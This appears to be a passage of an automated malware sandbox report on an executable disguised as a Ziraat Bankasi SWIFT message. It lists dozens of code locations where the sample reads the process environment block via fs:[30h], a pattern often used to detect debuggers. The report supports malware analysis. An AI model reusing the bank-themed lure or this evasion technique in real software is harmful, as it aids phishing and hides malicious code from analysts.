Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov ecx, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov eax, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov eax, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279080 mov eax, dword ptr fs:[00000030h] 6_2_01279080
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3884 mov eax, dword ptr fs:[00000030h] 6_2_012F3884
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3884 mov eax, dword ptr fs:[00000030h] 6_2_012F3884
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012758EC mov eax, dword ptr fs:[00000030h] 6_2_012758EC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0129B8E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0129B8E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133131B mov eax, dword ptr fs:[00000030h] 6_2_0133131B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0127DB60
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A3B7A mov eax, dword ptr fs:[00000030h] 6_2_012A3B7A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A3B7A mov eax, dword ptr fs:[00000030h] 6_2_012A3B7A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127DB40 mov eax, dword ptr fs:[00000030h] 6_2_0127DB40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348B58 mov eax, dword ptr fs:[00000030h] 6_2_01348B58
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127F358 mov eax, dword ptr fs:[00000030h] 6_2_0127F358
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01345BA5 mov eax, dword ptr fs:[00000030h] 6_2_01345BA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01281B8F mov eax, dword ptr fs:[00000030h] 6_2_01281B8F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01281B8F mov eax, dword ptr fs:[00000030h] 6_2_01281B8F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132D380 mov ecx, dword ptr fs:[00000030h] 6_2_0132D380
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133138A mov eax, dword ptr fs:[00000030h] 6_2_0133138A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AB390 mov eax, dword ptr fs:[00000030h] 6_2_012AB390
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2397 mov eax, dword ptr fs:[00000030h] 6_2_012A2397
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0129DBE9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F53CA mov eax, dword ptr fs:[00000030h] 6_2_012F53CA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F53CA mov eax, dword ptr fs:[00000030h] 6_2_012F53CA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B4A2C mov eax, dword ptr fs:[00000030h] 6_2_012B4A2C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B4A2C mov eax, dword ptr fs:[00000030h] 6_2_012B4A2C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01288A0A mov eax, dword ptr fs:[00000030h] 6_2_01288A0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AA16 mov eax, dword ptr fs:[00000030h] 6_2_0133AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AA16 mov eax, dword ptr fs:[00000030h] 6_2_0133AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AA16 mov eax, dword ptr fs:[00000030h] 6_2_0127AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AA16 mov eax, dword ptr fs:[00000030h] 6_2_0127AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01293A1C mov eax, dword ptr fs:[00000030h] 6_2_01293A1C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov ecx, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B927A mov eax, dword ptr fs:[00000030h] 6_2_012B927A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132B260 mov eax, dword ptr fs:[00000030h] 6_2_0132B260
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132B260 mov eax, dword ptr fs:[00000030h] 6_2_0132B260
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348A62 mov eax, dword ptr fs:[00000030h] 6_2_01348A62
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133EA55 mov eax, dword ptr fs:[00000030h] 6_2_0133EA55
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01304257 mov eax, dword ptr fs:[00000030h] 6_2_01304257
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0128AAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0128AAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFAB0 mov eax, dword ptr fs:[00000030h] 6_2_012AFAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AD294 mov eax, dword ptr fs:[00000030h] 6_2_012AD294
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AD294 mov eax, dword ptr fs:[00000030h] 6_2_012AD294
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2AE4 mov eax, dword ptr fs:[00000030h] 6_2_012A2AE4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2ACB mov eax, dword ptr fs:[00000030h] 6_2_012A2ACB
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348D34 mov eax, dword ptr fs:[00000030h] 6_2_01348D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133E539 mov eax, dword ptr fs:[00000030h] 6_2_0133E539
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AD30 mov eax, dword ptr fs:[00000030h] 6_2_0127AD30
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012FA537 mov eax, dword ptr fs:[00000030h] 6_2_012FA537
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C577 mov eax, dword ptr fs:[00000030h] 6_2_0129C577
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C577 mov eax, dword ptr fs:[00000030h] 6_2_0129C577
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B3D43 mov eax, dword ptr fs:[00000030h] 6_2_012B3D43
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3540 mov eax, dword ptr fs:[00000030h] 6_2_012F3540
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01323D40 mov eax, dword ptr fs:[00000030h] 6_2_01323D40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01297D50 mov eax, dword ptr fs:[00000030h] 6_2_01297D50
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A35A1 mov eax, dword ptr fs:[00000030h] 6_2_012A35A1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013405AC mov eax, dword ptr fs:[00000030h] 6_2_013405AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013405AC mov eax, dword ptr fs:[00000030h] 6_2_013405AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFD9B mov eax, dword ptr fs:[00000030h] 6_2_012AFD9B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFD9B mov eax, dword ptr fs:[00000030h] 6_2_012AFD9B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01328DF1 mov eax, dword ptr fs:[00000030h] 6_2_01328DF1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0128D5E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0128D5E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0133FDE2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0133FDE2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0133FDE2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0133FDE2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov eax, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov eax, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov eax, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov ecx, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov eax, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6DC9 mov eax, dword ptr fs:[00000030h] 6_2_012F6DC9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012ABC2C mov eax, dword ptr fs:[00000030h] 6_2_012ABC2C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6C0A mov eax, dword ptr fs:[00000030h] 6_2_012F6C0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6C0A mov eax, dword ptr fs:[00000030h] 6_2_012F6C0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6C0A mov eax, dword ptr fs:[00000030h] 6_2_012F6C0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6C0A mov eax, dword ptr fs:[00000030h] 6_2_012F6C0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331C06 mov eax, dword ptr fs:[00000030h] 6_2_01331C06
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134740D mov eax, dword ptr fs:[00000030h] 6_2_0134740D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134740D mov eax, dword ptr fs:[00000030h] 6_2_0134740D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134740D mov eax, dword ptr fs:[00000030h] 6_2_0134740D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129746D mov eax, dword ptr fs:[00000030h] 6_2_0129746D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130C450 mov eax, dword ptr fs:[00000030h] 6_2_0130C450
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130C450 mov eax, dword ptr fs:[00000030h] 6_2_0130C450
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA44B mov eax, dword ptr fs:[00000030h] 6_2_012AA44B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128849B mov eax, dword ptr fs:[00000030h] 6_2_0128849B
